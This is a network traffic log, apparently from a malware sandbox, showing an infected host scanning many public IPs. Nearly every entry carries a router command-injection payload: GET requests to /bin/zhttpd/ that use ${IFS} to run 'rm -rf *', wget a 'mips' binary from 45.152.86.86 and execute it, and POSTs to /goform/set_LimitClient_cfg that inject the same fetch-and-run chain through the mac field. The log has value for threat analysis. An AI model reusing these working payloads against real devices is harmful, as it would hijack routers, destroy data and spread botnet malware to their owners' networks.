                              Mar 31, 2024 08:41:20.745147943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3722192.168.2.1351962104.251.243.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745204926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3723192.168.2.134755414.85.18.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745233059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3724192.168.2.1350042119.4.255.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745258093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3725192.168.2.135946469.80.200.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745301962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3726192.168.2.1341488129.177.22.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745377064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3727192.168.2.1334832112.130.51.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745398998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3728192.168.2.1345528159.120.11.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745452881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3729192.168.2.134747827.81.67.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745488882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3730192.168.2.1341050160.113.254.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745520115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3731192.168.2.1334018161.20.61.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.745572090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3732192.168.2.1350840188.236.135.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.749942064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3733192.168.2.1346516148.214.46.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.749967098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3734192.168.2.1352858109.162.53.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750017881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3735192.168.2.1336066181.229.28.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750066996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3736192.168.2.1342246116.54.137.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750133038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3737192.168.2.135664457.80.69.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750166893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3738192.168.2.134992664.115.222.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750205040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3739192.168.2.135632690.73.116.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750252008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3740192.168.2.134401841.138.43.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750292063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3741192.168.2.133548044.45.53.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750345945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3742192.168.2.135225454.64.204.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750389099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3743192.168.2.135165294.223.38.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750425100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3744192.168.2.133978464.138.13.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750482082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3745192.168.2.1350016193.243.109.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750534058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3746192.168.2.134655263.235.37.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750577927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3747192.168.2.1340914116.113.165.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750617027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3748192.168.2.1346954174.194.233.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750658035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3749192.168.2.1346358109.110.10.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750726938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3750192.168.2.133891472.98.142.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750756979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3751192.168.2.1352196149.186.42.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750790119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3752192.168.2.1340914179.64.241.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750842094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3753192.168.2.1349126119.167.73.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750869989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3754192.168.2.134503043.158.142.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750890017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3755192.168.2.135650852.202.237.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750942945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3756192.168.2.136011880.185.29.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.750969887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3757192.168.2.134870844.130.105.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751018047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3758192.168.2.1341292142.236.142.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751049995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3759192.168.2.1339552216.63.215.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751080990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3760192.168.2.1351506117.148.247.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751125097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3761192.168.2.1343768207.35.127.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751172066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3762192.168.2.1346662197.139.243.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751224995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3763192.168.2.1333972119.202.21.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751266003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3764192.168.2.1340282118.5.135.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751305103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3765192.168.2.134394264.215.154.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751328945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3766192.168.2.1352872216.179.165.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751364946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3767192.168.2.133540437.103.35.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751418114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3768192.168.2.1338516169.61.79.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.751471043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3769192.168.2.133369869.194.123.628080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.078252077 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:24.150758982 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:30.294819117 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:42.326802015 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:06.902647972 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3770192.168.2.1344024112.179.55.118080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.365530014 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:21.652278900 CEST103INHTTP/1.1 404 Not Found
                              Content-Type: text/plain
                              Content-Length: 30
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              3771192.168.2.135560093.134.37.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754460096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3772192.168.2.134000434.95.241.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754503012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3773192.168.2.1350816207.146.217.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754540920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3774192.168.2.133488291.109.181.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754606962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3775192.168.2.135323614.246.86.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754647970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3776192.168.2.135711076.126.255.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754687071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3777192.168.2.1340026129.143.145.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754755974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3778192.168.2.135780468.4.170.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754786968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3779192.168.2.1355712131.86.223.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:21.754822016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


